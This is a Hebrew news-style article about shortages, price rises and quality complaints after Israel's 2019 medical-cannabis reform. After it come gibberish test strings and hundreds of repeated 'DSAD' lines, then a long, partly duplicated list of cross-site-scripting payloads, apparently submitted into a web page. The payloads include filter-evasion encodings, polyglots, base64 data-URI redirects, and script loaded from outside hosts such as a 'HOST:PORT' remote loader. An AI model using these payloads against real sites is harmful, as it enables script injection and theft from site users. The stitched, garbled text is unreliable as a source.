הרפורמה שכשלה: מחסור חמור בקנאביס רפואי בארץ
בעקבות מהפכת הקנאביס הרפואי, נוצר חוסר במלאי באספקת הקנאביס ברחבי הארץ. בתי המרקחת ריקים כמעט לחלוטין מקנאביס והמטופלים הזקוקים לקנאביס הרפואי מיואשים מהמצב. רפורמת הקנאביס הרפואי הייתה אמורה להיות בשורה חיובית ומשמחת עבור המטופלים הזקוקים לקנאביס. הרפורמה, שנכנסה לתוקפה במאי 2019, נועדה להסדיר את מעמדו של הקנאביס הרפואי כתרופה ולהקל על החולים ברכישה ובצריכה. היא הגדירה בין היתר שרכישת קנאביס רפואי תהיה בבתי מרקחת ולא דרך עמדות חלוקה ספורות כמו בית חולים אברבנאל, נקודת החלוקה ״תיקון עולם״ שבתל אביב או ישירות מהמגדלים. עוד קבעה הרפורמה שרופאים שעברו הכשרה מתאימה יוכלו להנפיק רשיון עבור מגדלי קנאביס רפואי, ומגדלי קנאביס יקבלו את הרשיון כל עוד הם עומדים בתקן משרד הבריאות. בנוסף, נאסר על המגדלים להיות בקשר ישיר עם המטופל, ונקבע כי שקית של 10 גרם תעלה 180 שקלים. כביכול מדובר בצעדים חיוביים שיאפשרו לחולי סרטן, טרשת נפוצה, בעיות מפרקים, אנשים הסובלים מאפליפסיה, מפוסט טראומה ומכאבים כרוניים לרכוש באופן מסודר את הקנאביס הרפואי. אלא שבפועל, הרפורמה הסבה יותר נזק מתועלת. מחירים יקרים יותר מאז שיצאה הרפורמה לדרך, נוצר זינוק עצום במחירי הקנאביס הרפואי. אם בעבר המטופלים שלמו מחיר קבוע וחודשי – 470 שקלים לחודש כולל דמי משלוח, הרי שהיום המחיר הינו לפי גרם – 180 שקלים לשקית של 10 גרם. המשמעות היא ש-64 אחוז מהמטופלים בארץ הצורכים יותר מ-30 גרם נאלצים לשלם הרבה יותר עבור צריכת הקנאביס הרפואי. עבור החולים שזקוקים לקאנביס כדי להתמודד עם כאבים פיזיים ו/או נפשיים יומיומיים, מדובר בהוצאה כספית כבדה המקשה עוד יותר על חייהם. מחסור בקנאביס מטופלים רבים מתלוננים על כך שישנו מחסור בקנאביס רפואי בבתי המרקחת מאז שהרפורמה הושקה. הרפורמה מגדירה מספר זנים מצומצם של קנאביס אותם ניתן לרכוש, ובמידה ומטופל זקוק לזן אחר אין בנמצא. במקרים רבים אחרים מדפי בית המרקחת ריקים כמעט לחלוטין מקנאביס רפואי בשל מחסור בתפרחות קנאביס. בתי המרקחת טוענים כי הסיבה למחסור בתפרחות הקנאביס היא שיצרני מוצרי הקנאביס לא מצליחים לעמוד בביקוש הרב. רוצים לדעת איך לגדל קנאביס בבית בשיטה הידרופונית? לחצו כאן בלית ברירה המטופלים נאלצים לנסוע מרחקים ארוכים כדי לרכוש קנאביס, או לחלופין הם פונים לשוק השחור ורוכשים קנאביס רפואי באופן פיראטי כשלא ברור מה טיב האיכות של המוצר. איכות ירודה טענה נוספת שנשמעת מפי המטופלים היא שמאז השקת הרפורמה האיכות של הקנאביס נפגמה. הועלו טענות על ריח של עובש משקיות הקנאביס, ונוצר בקרב המטופלים חשש כי החומר רוסס בחומרי הדברה. על שקיות הקנאביס הרפואי הנמכרות בבתי מרקחת לא מצוין האם החומר אורגני או מודבר, ומשרד הבריאות לא הגדיר תקנות בנושא בטענה כי זוהי אחריותו של משרד החקלאות. מטופלי הקנאביס הרפואי לא מוכנים לקבל את הרפורמה. בסוף חודש מארס 2019 הם הגישו עתירה לבג״ץ נגד יישומה. בתגובה, שופטי בג״ץ הוציאו באוקטובר 2019 צו ביניים המורה למשרד הבריאות להאריך את האסדרה הישנה של הקנאביס הרפואי כפי שהייתה לפני הרפורמה עד לתאריך ה-31 במרץ 2020. בנוסף, בצו עלתה דרישה ממשרד הבריאות לקבל עדכון חודשי לגבי הדיונים העוסקים בפיקוח על מחירי הקנאביס הרפואי ועל התקדמות הסבת רשיונות המטופלים. למרות זאת, המצב נותר כשהיה – המחירים יקרים וישנו מחסור חמור בקנאביס הרפואי. החולים מרגישים שהם חיים בתוך סיוט מתמשך ומקווים שהמצב ישתנה במהרה. בשבילם הקנאביס הוא לא סם ״ממסטל״ או ״סם לבילויים וצחוקים עם החבר׳ה״. מדובר בתרופה לכל דבר, כזו שעוזרת להם להעביר את הימים קצת יותר בקלות ולהתמודד עם הסבל והכאב.
e
sdfsdfsdf
sdfsdfsdf
<b>hello</b>
d
שגשג
שגשג
שגשג
'
'
'
SDASD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
alert`1`
DSAD
alert(1)
alert(1&#x29
alert(1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
navigator.vibrate(500)
eval(location.hash.slice(1)>#alert(1)
eval(URL.slice(-8))>#alert(1)
innerHTML=location.hash>#<script>alert(1)</script>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
</script><svg onload=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<script>alert(1)//
<script>alert(1)<!–
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
<x onxxx=alert(1)
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
<x onxxx=1 onxxx=1
<x/onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x/onxxx=1
<x onxxx=1
<x 1='1'onxxx=1
<x </onxxx=1
<x 1="1"onxxx=1
<x 1=">" onxxx=1
<x onxxx=alert(1) 1='
<http://onxxx=1/
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
*/alert(1)">'onload="/*<svg/1='
*/alert(1)</script><script>/*
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
'>alert(1)</script><script/1='
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<isindex action=javascript:alert(1) type=submit value=click>
<form action=javascript:alert(1)><input type=submit>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<html ontouchstart=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchend=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<script src="data:,alert(1)//
"><script src=data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
<base href=//0>
"><link rel=import href=data:text/html,<script>alert(1)</script>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<body onresize=alert(1)>press F12!
<marquee onstart=alert(1)>
<body onhelp=alert(1)>press F1! (MSIE)
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
<img src=x onerror=alert('XSS');>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<video/poster/onerror=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
<script>window['alert'](document['domain'])<script>
<img src='1' onerror/=alert(0) />
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
'-alert(1)-'
"autofocus/onfocus=alert(1)//
'-alert(1)//
\'-alert(1)//
</script><svg onload=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!
<x oncopy=alert(1)>copy this!
<x onclick=alert(1)>click this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>cut this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousemove=alert(1)>hover this!
<x onmousedown=alert(1)>click this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<script>alert(1)//
<script>alert(1)<!–
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
<x onxxx=alert(1)
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
<x onxxx=1 onxxx=1
<x/onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x onxxx=1
<x/onxxx=1
<x 1='1'onxxx=1
<x 1="1"onxxx=1
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx=1/
<x onxxx=alert(1) 1='
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<script src="data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=data:,alert(1)//
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
<html ontouchmove=alert(1)>
"><link rel=import href=data:text/html,<script>alert(1)</script>
<base href=//0>
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
